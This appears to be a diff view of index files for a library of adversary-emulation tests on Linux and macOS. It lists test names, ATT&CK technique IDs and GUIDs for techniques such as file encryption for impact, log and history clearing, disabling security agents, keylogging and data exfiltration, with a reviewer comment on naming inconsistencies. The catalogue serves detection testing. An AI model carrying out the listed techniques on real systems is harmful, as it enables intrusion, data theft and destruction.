285 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
286 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
287 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
288 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
289 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
290 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
291 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
292 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
293 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
294 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
295 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
296 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
297 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
298 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
299 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
300 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
301 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
302 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
303 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
304 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
305 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
306 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
307 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
308 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
309 execution T1059.004 Command and Scripting Interpreter: Bash 5 New script file in the tmp directory 8cd1947b-4a54-41fb-b5ea-07d0ace04f81 sh
310 execution T1059.004 Command and Scripting Interpreter: Bash 6 What shell is running 7b38e5cc-47be-44f0-a425-390305c76c17 sh
311 execution T1059.004 Command and Scripting Interpreter: Bash 7 What shells are available bf23c7dc-1004-4949-8262-4c1d1ef87702 sh
312 execution T1059.004 Command and Scripting Interpreter: Bash 8 Command line scripts b04ed73c-7d43-4dc8-b563-a2fc595cba1a sh
313 execution T1059.004 Command and Scripting Interpreter: Bash 9 Obfuscated command line scripts 5bec4cc8-f41e-437b-b417-33ff60acf9af sh
314 execution T1059.004 Command and Scripting Interpreter: Bash 10 Change login shell c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 bash
315 execution T1059.004 Command and Scripting Interpreter: Bash 11 Environment variable scripts bdaebd56-368b-4970-a523-f905ff4a8a51 bash
316 execution T1059.004 Command and Scripting Interpreter: Bash 12 Detecting pipe-to-shell fca246a8-a585-4f28-a2df-6495973976a1 bash
317 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
318 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
319 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
320 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 bash
321 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
322 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
323 initial-access T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
324 initial-access T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
325 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
326 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
327 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
328 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
329 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
330 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
331 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 8 Python3 http.server 3ea1f938-f80a-4305-9aa8-431bc4867313 sh
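Review bot: three rows in this index carry name-field inconsistencies that will propagate to every consumer of the CSV. Row 325 (T1048.002) separates parent and sub-technique with " - " ("Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"), while rows 329 and 330 and every other sub-technique row use the "Parent: Sub-technique" form, so anyone splitting on ": " to recover the parent technique gets a different result for this one row. Row 317 (T1059.006 test 1) misspells "argument" as "arguement", and row 204 (T1543.002 test 2) has a stray space before the comma and a trailing period ("Enable the service , Modify and Reload the service."). Assuming this CSV is generated from the atomic test definitions, the fixes belong in the technique-name and test-name fields of the source YAML for T1048.002, T1059.006 and T1543.002, with the index regenerated afterwards, rather than in this file directly.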
-249
View File
@@ -1,249 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,4,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,5,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,6,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,7,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,8,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,9,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,10,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,11,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,12,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,3,Copy and Delete Mailbox Data on macOS,3824130e-a6e4-4528-8091-3a52eeb540f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,6,Copy and Modify Mailbox Data on macOS,8a0b1579-5a36-483a-9cde-0236983e1665,bash
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
